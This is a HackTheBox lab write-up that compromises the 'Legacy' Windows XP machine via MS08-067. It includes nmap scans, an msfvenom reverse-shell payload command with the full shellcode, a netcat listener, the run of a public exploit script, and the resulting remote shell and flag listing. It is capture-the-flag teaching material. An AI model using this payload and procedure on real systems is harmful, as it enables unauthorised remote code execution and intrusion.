Solving Legacy HackTheBox, MS08–67

Varun
5 min readJan 13, 2021

--

MS08–67

This vulnerability in Server Service allows remote code Execution. Windows 2000, XP and Server 2003 Systems were affected.

Recon

Doing a port scan on the box.

┌──(kali㉿kali)-[~/HackTheBox/Legacy/recon]
└─$ nmap -sC -sV -Pn -p0-1000 10.10.10.4 > results.txt &
[1] 10549┌──(kali㉿kali)-[~/HackTheBox/Legacy/recon]
└─$ cat results.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-13 00:49 EST
Nmap scan report for 10.10.10.4
Host is up (0.20s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h58m18s, deviation: 1h24m50s, median: 4d23h58m18s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:a7:6b (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2021-01-18T09:48:15+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.46 seconds

From this we can get to know that the system is running Windows XP with name Legacy. From our past experience doing the Blue box, let’s try out a vulnerability scan using NSE.

NSE vulnerability scanning

┌──(kali㉿kali)-[~/HackTheBox/Legacy/recon]
└─$ nmap --script vuln -Pn 10.10.10.4 -p 445 > vulnerabilitycheck.txt &
[1] 10611
┌──(kali㉿kali)-[~/HackTheBox/Legacy/recon]
└─$ cat vulnerabilitycheck.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-13 12:37 EST
Nmap scan report for 10.10.10.4
Host is up (0.25s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 28.12 seconds

From the above check it’s pretty clear that the system is vulnerable to MS08–67 and MS17–010 aka EternalBlue.

I will be using the MS08–67 to get access to the box. After a bit of searching found this exploit from jivoi.

Exploit

I cloned the entire repo onto my system and started going through the code. It’s mentioned that the shellcode must be created and replaced in the script, for it to work.

Let’s create the shellcode then!

┌──(kali㉿kali)-[~/GitRepos/pentest/exploit_win]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=53 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1488 bytes
unsigned char buf[] =
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xb7\x82\x9e\xcc\x83\xee\xfc\xe2\xf4\x4b\x6a\x1c\xcc\xb7\x82"
"\xfe\x45\x52\xb3\x5e\xa8\x3c\xd2\xae\x47\xe5\x8e\x15\x9e\xa3"
"\x09\xec\xe4\xb8\x35\xd4\xea\x86\x7d\x32\xf0\xd6\xfe\x9c\xe0"
"\x97\x43\x51\xc1\xb6\x45\x7c\x3e\xe5\xd5\x15\x9e\xa7\x09\xd4"
"\xf0\x3c\xce\x8f\xb4\x54\xca\x9f\x1d\xe6\x09\xc7\xec\xb6\x51"
"\x15\x85\xaf\x61\xa4\x85\x3c\xb6\x15\xcd\x61\xb3\x61\x60\x76"
"\x4d\x93\xcd\x70\xba\x7e\xb9\x41\x81\xe3\x34\x8c\xff\xba\xb9"
"\x53\xda\x15\x94\x93\x83\x4d\xaa\x3c\x8e\xd5\x47\xef\x9e\x9f"
"\x1f\x3c\x86\x15\xcd\x67\x0b\xda\xe8\x93\xd9\xc5\xad\xee\xd8"
"\xcf\x33\x57\xdd\xc1\x96\x3c\x90\x75\x41\xea\xea\xad\xfe\xb7"
"\x82\xf6\xbb\xc4\xb0\xc1\x98\xdf\xce\xe9\xea\xb0\x7d\x4b\x74"
"\x27\x83\x9e\xcc\x9e\x46\xca\x9c\xdf\xab\x1e\xa7\xb7\x7d\x4b"
"\x9c\xe7\xd2\xce\x8c\xe7\xc2\xce\xa4\x5d\x8d\x41\x2c\x48\x57"
"\x09\xa6\xb2\xea\x94\xc6\xb9\x85\xf6\xce\xb7\x82\xab\x45\x51"
"\xe8\x8e\x9a\xe0\xea\x07\x69\xc3\xe3\x61\x19\x32\x42\xea\xc0"
"\x48\xcc\x96\xb9\x5b\xea\x6e\x79\x15\xd4\x61\x19\xdf\xe1\xf3"
"\xa8\xb7\x0b\x7d\x9b\xe0\xd5\xaf\x3a\xdd\x90\xc7\x9a\x55\x7f"
"\xf8\x0b\xf3\xa6\xa2\xcd\xb6\x0f\xda\xe8\xa7\x44\x9e\x88\xe3"
"\xd2\xc8\x9a\xe1\xc4\xc8\x82\xe1\xd4\xcd\x9a\xdf\xfb\x52\xf3"
"\x31\x7d\x4b\x45\x57\xcc\xc8\x8a\x48\xb2\xf6\xc4\x30\x9f\xfe"
"\x33\x62\x39\x7e\xd1\x9d\x88\xf6\x6a\x22\x3f\x03\x33\x62\xbe"
"\x98\xb0\xbd\x02\x65\x2c\xc2\x87\x25\x8b\xa4\xf0\xf1\xa6\xb7"
"\xd1\x61\x19";

This basically means we are creating a reverse shell at our local address and at port 53, since the system is a 32bit one we are defining the architecture as x86, and also defining the bad characters \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40.

Now replacing the shellcode in the file with the generated one, our exploit is all set to crack into the machine :)

Setting up a listener at port 53

┌──(kali㉿kali)-[~/HackTheBox/Legacy/exploits]
└─$ sudo nc -nvlp 53
listening on [any] 53 ...

Running the exploit

┌──(kali㉿kali)-[~/GitRepos/pentest/exploit_win]
└─$ python2 ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################
$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .
#######################################################################Windows XP SP3 English (NX)[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

Here I have given the target system ip, port and system type as arguments.

Defining the system version is important as the addresses are different for each one. I choose the Universal one first but didn’t get the shell then moved to the XP SP3 English which worked.

┌──(kali㉿kali)-[~/HackTheBox/Legacy/exploits]
└─$ sudo nc -nvlp 53
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.4] 1033
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Got the shell!!!

If by any chance you are getting any connection errors do check out this form, it helped me out!

Flags

Traversing to the Documents and Settings directory I found the user john and Administrator

C:\Documents and Settings>cd john/Desktop
cd john/Desktop
C:\Documents and Settings\john\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop16/03/2017 08:19 �� <DIR> .
16/03/2017 08:19 �� <DIR> ..
16/03/2017 08:19 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.297.694.208 bytes free
C:\Documents and Settings>cd Administrator\Desktop
cd Administrator\Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop16/03/2017 08:18 �� <DIR> .
16/03/2017 08:18 �� <DIR> ..
16/03/2017 08:18 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.297.747.456 bytes free
C:\Documents and Settings\Administrator\Desktop>

Boo Yeah! Solved Legacy :)

--

--